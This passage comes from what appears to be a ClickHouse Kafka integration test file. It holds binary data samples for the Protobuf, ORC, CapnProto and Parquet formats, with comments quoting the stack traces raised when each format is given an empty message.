# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
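# The kafka_schema value above follows the '<schema file>:<message type>' convention;
# 'test:TestMessage' presumably points at a TestMessage definition in the test's schema directory.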
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x1